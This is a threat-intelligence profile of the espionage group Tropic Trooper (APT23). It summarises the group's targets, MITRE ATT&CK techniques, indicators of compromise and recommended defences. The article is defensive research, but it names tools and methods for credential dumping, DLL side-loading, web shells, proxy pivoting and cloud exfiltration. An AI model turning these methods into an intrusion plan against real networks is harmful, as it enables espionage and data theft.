Threat Research

Tropic Trooper (APT23): A Profile of Dark Web Activities

SocRadar

Tropic Trooper (aka Pirate Panda / APT23) is a China-linked espionage group active since 2011 that targets government, healthcare, transportation, and other high-value sectors across East and Southeast Asia using spear-phishing, exploited server vulnerabilities, and custom backdoors. Their toolset includes web shells like ChinaChopper, DLL side-loading, and bespoke backdoors such as Crowdoor, enabling long-term access and data exfiltration. #TropicTrooper #ChinaChopper

Keypoints

  • Active since 2011, Tropic Trooper (aka Pirate Panda / APT23) conducts long-running espionage campaigns focused on East and Southeast Asia.
  • Initial access is frequently achieved through tailored spear-phishing attachments and by exploiting public-facing servers, notably Exchange and other web apps.
  • The group uses custom and off-the-shelf tools (ChinaChopper, ShadowPad, PoisonIvy, Quasar RAT, Crowdoor) for persistence and remote control.
  • They employ DLL side-loading, web shells, obfuscation/encryption, and autostart mechanisms to evade detection and maintain long-term access.
  • Tropic Trooper escalates privileges using DLL hijacking and other exploits, then moves laterally via SMB/admin shares, proxies, and tunneling tools.
  • Data exfiltration is staged and stealthy, using cloud sync tools (RClone), BITS jobs, and encrypted channels to extract high-value intelligence.
  • Defensive recommendations include enhanced email security, MFA and privileged account management, network segmentation, EDR, patching, and CTI-informed incident response.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used to gain initial access by targeting vulnerable servers (e.g., Exchange); (‘Exploit public-facing application’)
  • [T1566.001] Spearphishing Attachment – Spear-phishing emails with malicious Office/PDF attachments are leveraged for initial compromise; (‘Spear Phishing Attachment’)
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell is used to execute payloads and scripts during compromise and post-exploitation; (‘Command and Scripting Interpreter: PowerShell’)
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Windows shell commands are executed to run tools and manipulate the host; (‘Command and Scripting Interpreter: Windows Command Shell’)
  • [T1569.002] System Services: Service Execution – Services are used to execute malicious components as part of persistence and execution; (‘System Services: Service Execution’)
  • [T1543.003] Create or Modify System Process: Windows Service – Windows services are created or modified to maintain persistence; (‘Create or Modify System Process: Windows Service’)
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – DLL search-order hijacking (e.g., datast.dll, VERSION.dll) is used to load malicious code; (‘Hijack Execution Flow: DLL Side-Loading’)
  • [T1505.003] Server Software Component: Web Shell – Web shells (e.g., ChinaChopper, Umbraco web modules) are deployed to retain access on compromised servers; (‘Server Software Component: Web Shell’)
  • [T1140] Deobfuscate/Decode Files or Information – Attackers use deobfuscation and decryption routines to decode next-stage payloads; (‘Deobfuscate/Decode Files or Information’)
  • [T1070.001] Indicator Removal on Host: Clear Windows Event Logs – Event logs are cleared to remove forensic traces of activity; (‘Indicator Removal on Host: Clear Windows Event Logs’)
  • [T1027.002] Obfuscated Files or Information: Software Packing – Malware payloads are packed or obfuscated to evade signature detection; (‘Obfuscated Files or Information: Software Packing’)
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – Signed or legitimate binaries (e.g., rundll32) are used to proxy execution of malicious code; (‘Signed Binary Proxy Execution: Rundll32’)
  • [T1036.005] Masquerading: Match Legitimate Name or Location – Malicious files and modules are named or placed to resemble legitimate software components; (‘Masquerading: Match Legitimate Name or Location’)
  • [T1003.001] OS Credential Dumping: LSASS Memory – Credential dumping from LSASS memory is used to harvest account credentials; (‘OS Credential Dumping: LSASS Memory’)
  • [T1552.002] Credentials in Registry – Credentials stored in the registry are harvested for lateral movement and privilege escalation; (‘OS Credential Dumping: Credentials in Registry’)
  • [T1021.002] Remote Services: SMB/Windows Admin Shares – SMB and admin share access is used for lateral movement across systems; (‘Remote Services: SMB/Windows Admin Shares’)
  • [T1087.002] Account Discovery: Domain Account – Discovery of domain accounts supports target identification and escalation; (‘Account Discovery: Domain Account’)
  • [T1482] Domain Trust Discovery – Domain trust relationships are enumerated to plan broader network access; (‘Domain Trust Discovery’)
  • [T1083] File and Directory Discovery – Files and directories are searched to locate valuable data and credentials; (‘File and Directory Discovery’)
  • [T1005] Data from Local System – Sensitive files are collected from local systems for exfiltration; (‘Data from Local System’)
  • [T1071.001] Application Layer Protocol: Web Protocols – Web-based protocols are used for command-and-control traffic and data transfer; (‘Application Layer Protocol: Web Protocols’)
  • [T1095] Non-Application Layer Protocol – Non-application layer channels are used for C2 in some operations; (‘Non-Application Layer Protocol’)
  • [T1090.001] Proxy: Internal Proxy – Internal proxying (e.g., SOCKS5 via neo-reGeorg) is used to pivot and hide traffic; (‘Proxy: Internal Proxy’)
  • [T1567.002] Exfiltration to Cloud Storage – Tools like RClone are used to sync stolen data to cloud storage for exfiltration; (‘Exfiltration to Cloud Storage’)
  • [T1020] Automated Exfiltration – Automated methods are used to move collected data out of the environment stealthily; (‘Automated Exfiltration’)
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Autostart registry keys and startup mechanisms are used to re-launch malware on reboot; (‘Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder’)
  • [T1203] Exploitation for Client Execution – Exploits (e.g., in Office documents) trigger client-side code execution to deliver payloads; (‘Exploitation for Client Execution’)
  • [T1564.001] Hide Artifacts: Hidden Files and Directories – Hidden files and directories are used to conceal tools and exfiltration staging; (‘Hide Artifacts: Hidden Files and Directories’)
  • [T1518.001] Software Discovery – Software inventories are gathered to identify suitable targets and exploitable applications; (‘Software Discovery’)
  • [T1082] System Information Discovery – System information is collected to inform the attackers’ next steps; (‘System Information Discovery’)
  • [T1016] System Network Configuration Discovery – Network configuration details are discovered to map the environment; (‘System Network Configuration Discovery’)
  • [T1049] System Network Connections Discovery – Active network connections are enumerated to understand communication paths; (‘System Network Connections Discovery’)
  • [T1033] System Owner/User Discovery – User and owner metadata are collected to prioritize targets and accounts; (‘System Owner/User Discovery’)
  • [T1204.002] User Execution: Malicious File – User interaction with malicious files is a common vector for execution via spear-phishing; (‘User Execution: Malicious File’)
  • [T1078.003] Valid Accounts: Local Accounts – Compromised local accounts are used to maintain access and move laterally; (‘Valid Accounts: Local Accounts’)

Indicators of Compromise

  • [File names] Malicious DLLs and loaders observed in intrusions – datast.dll, VERSION.dll (used in DLL search-order hijacking to load backdoors)
  • [Web shells] Server-based persistent access – ChinaChopper, Umbraco web modules (used to place files and maintain control on compromised web servers)
  • [Malware / Tool names] Remote access and exfiltration tools linked to activity – Crowdoor (backdoor delivering Cobalt Strike), Quasar RAT, ShadowPad, PoisonIvy (used for persistence, remote control, and data theft)
  • [Exfiltration tools] Cloud and transfer utilities used to remove data – RClone, BITSAdmin (used to sync or transfer stolen files), and other data-transfer tools
  • [Vulnerability reference] Exploited CVE/event context – CVE-2023-26360 referenced in relation to ByPassGodzilla web shell obfuscation

Rewritten Article

Tropic Trooper, which security researchers also refer to as Pirate Panda or APT23, is a Chinese state-linked espionage group that has operated since at least 2011. The group targets sensitive organizations—most notably government bodies, healthcare institutions, transportation, and defense-related networks—primarily across Taiwan, Hong Kong, the Philippines, and wider parts of Southeast Asia. Over time their campaigns expanded geographically and tactically, reflecting priorities that align with Chinese geopolitical interests.

The group’s intrusion playbook centers on carefully crafted spear-phishing messages and the exploitation of vulnerable public-facing applications. Attackers frequently send convincing emails with malicious Microsoft Office documents or PDFs, or they lure victims to compromised web pages hosting exploit kits. They also take advantage of vulnerable servers, such as Exchange, and implant web shells to gain an initial foothold. These initial steps let Tropic Trooper deliver and execute payloads that establish long-term presence in targeted networks.

After breaching a target, Tropic Trooper focuses on persistence using a mix of custom and off-the-shelf malware. Notable tools observed include the lightweight ChinaChopper web shell, custom backdoors like Crowdoor, and remote access trojans such as Quasar RAT, ShadowPad, and PoisonIvy. The group uses encrypted payloads, obfuscation, and periodic tool changes to avoid signature-based detection. They frequently register callback functions, deploy encrypted loaders, and employ autostart mechanisms so their code survives reboots and detection attempts.

Privilege escalation is a typical next step. Tropic Trooper has exploited DLL search-order hijacking and similar techniques to load malicious libraries under the guise of legitimate DLLs (examples include datast.dll and VERSION.dll), enabling backdoor loaders to decrypt and run further stages. In other cases they use dynamic-link library injection and other exploits to gain administrative control, which then permits them to disable defenses and move freely within the environment.

Lateral movement follows escalation. The operators map network topology, discover domain accounts and trust relationships, and harvest credentials from locations such as LSASS memory and the registry. Tools like neo-reGeorg (SOCKS5 proxy), FRPC, and Chisel are leveraged to pivot between segmented networks and forward traffic around security controls. They also use SMB and Windows admin shares to spread to additional hosts and to create multiple access points in the environment.

The ultimate objective is data collection and exfiltration. Once high-value assets and directories are identified, Tropic Trooper compresses, encrypts, and stages data for stealthy removal. They have used RClone to sync data to cloud storage, employed BITS jobs and other covert channels to transfer files, and scripted automated exfiltration to minimize detection. The group prioritizes information that supports long-term intelligence goals, including governmental documents, healthcare records, research data, and military-related materials.

Between 2021 and 2024 the group evolved both its targets and technical approaches. Reports from multiple vendors document an expansion into transportation, governmental agencies outside East Asia, and even human rights organizations in geopolitically sensitive regions. Technically, Tropic Trooper has incorporated more advanced red-team-like techniques, refined custom decryption routines, and adopted DLL side-loading and proxying methods to better evade defenders. In 2024 researchers noted the use of a Crowdoor backdoor variant to deliver Cobalt Strike, alongside improved usage of legacy tools like Quasar RAT with custom unpacking and loading methods.

Defending against Tropic Trooper requires a layered strategy that addresses both the initial vectors and the techniques used for persistence and exfiltration. Email defenses and phishing-resistant authentication such as MFA reduce the success of targeted attachments. Limiting privileges, using privileged account management, and applying strict network segmentation reduce the impact of successful compromises. Endpoint detection and response (EDR) systems help detect anomalous behavior and custom malware, while regular patch management and timely remediation of known server vulnerabilities (for example, Exchange and ColdFusion issues) eliminate common entry points. Continuous network monitoring, IDS/IPS, and a tested incident response plan informed by up-to-date cyber threat intelligence are also critical to detect and contain intrusions early.

In short, Tropic Trooper remains a persistent, adaptable espionage actor that combines targeted social engineering with custom and publicly available tooling to conduct long-term intelligence collection. Organizations in the group’s target sectors should adopt proactive defenses, maintain robust detection capabilities, and keep threat intelligence current to mitigate the risk posed by this actor.

Read more: https://socradar.io/dark-web-profile-tropic-trooper-apt23/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint